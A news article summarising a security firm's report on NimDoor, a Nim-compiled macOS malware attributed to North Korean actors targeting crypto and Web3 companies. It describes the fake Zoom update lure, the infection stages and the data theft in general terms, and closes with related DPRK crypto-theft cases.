A recent report by SentinelLabs has revealed that North Korea-linked threat actors have unleashed a new malware called NimDoor, targeting companies in the Web3 and crypto industry. This sophisticated malware, compiled in the Nim programming language, is specifically designed to target macOS systems. Unlike more commonly used programming languages, Nim allows code execution during compilation, creating binaries that blend runtime and malware logic. This unique feature complicates efforts to reverse engineer and detect the malware.
The campaign involving NimDoor was first detected in April 2025 during an attack on a crypto startup. Since then, multiple security firms have confirmed similar incidents affecting other companies in the Web3 and crypto space. SentinelLabs’ report sheds light on how the attackers deploy cyberattacks on their victims. They use classic social engineering tactics to trick individuals into running the malicious code. Victims are approached on platforms like Telegram by impersonated contacts who invite them to schedule a meeting via Calendly. Subsequently, victims receive an email with a Zoom link and instructions to install a supposed “Zoom SDK update.”
The link provided in the email directs users to an AppleScript file hosted on domains that mimic Zoom’s official URLs. The script is heavily padded with thousands of lines of whitespace and concludes with code that fetches a second-stage payload from servers controlled by the attackers. Once the initial download is completed, the malware deploys two Mach-O binaries in the system’s temporary directory. The first binary, written in C++, performs process injection to launch a trojan, while the second binary, compiled from Nim and labeled installer, installs persistence tools to ensure the malware remains active even after system reboots or terminations.
The malware then drops two additional Nim-based binaries, GoogIe LLC and CoreKitAgent, which play roles in long-term access and system monitoring. These binaries execute scripts that steal user data, with the upl script extracting login credentials and browsing history from browsers like Google Chrome and Firefox, and the tlgrm script specifically targeting Telegram data. The stolen data is compressed and sent to servers disguised as secure upload portals hosted by the attackers.
This recent development is part of North Korea’s evolving cyber arsenal, with hackers turning to rare programming languages like Nim to evade traditional detection tools. Previous campaigns by DPRK-affiliated actors have involved languages such as Go, Rust, and Crystal, indicating a trend towards using less common programming languages in cyberattacks.
North Korea’s cyber activities have been a cause for concern, with recent incidents involving the targeting of U.S. crypto developers through malware campaigns using fake companies like Blocknovas LLC and Softglide LLC. These operations, tied to a Lazarus Group subgroup, used fake job offers to spread malware that stole crypto wallets and credentials. South Korea and the EU have pledged closer cooperation to combat cyber threats emanating from North Korea, with a focus on the country’s crypto crimes.
In a recent development, the U.S. Department of Justice charged four North Koreans with stealing over $900,000 in cryptocurrency by posing as remote IT workers at blockchain firms. These individuals used fake identities to alter smart contracts and carry out thefts as part of a scheme to fund North Korea’s weapons program. These incidents underscore the growing threat posed by North Korean hackers in the realm of cybersecurity and crypto-related crimes.
Overall, the emergence of NimDoor and other sophisticated malware highlights the need for increased vigilance and robust cybersecurity measures within the Web3 and crypto industry. As threat actors continue to evolve their tactics and techniques, it is essential for companies and individuals in the space to stay informed and take proactive steps to protect their systems and data.